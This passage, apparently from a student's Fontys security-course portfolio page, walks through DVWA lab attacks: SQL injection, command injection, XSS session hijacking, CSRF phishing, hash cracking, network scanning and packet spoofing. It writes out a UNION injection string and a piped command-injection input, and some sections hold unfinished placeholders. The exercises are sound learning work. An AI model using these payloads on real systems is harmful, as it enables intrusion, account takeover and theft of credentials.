          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
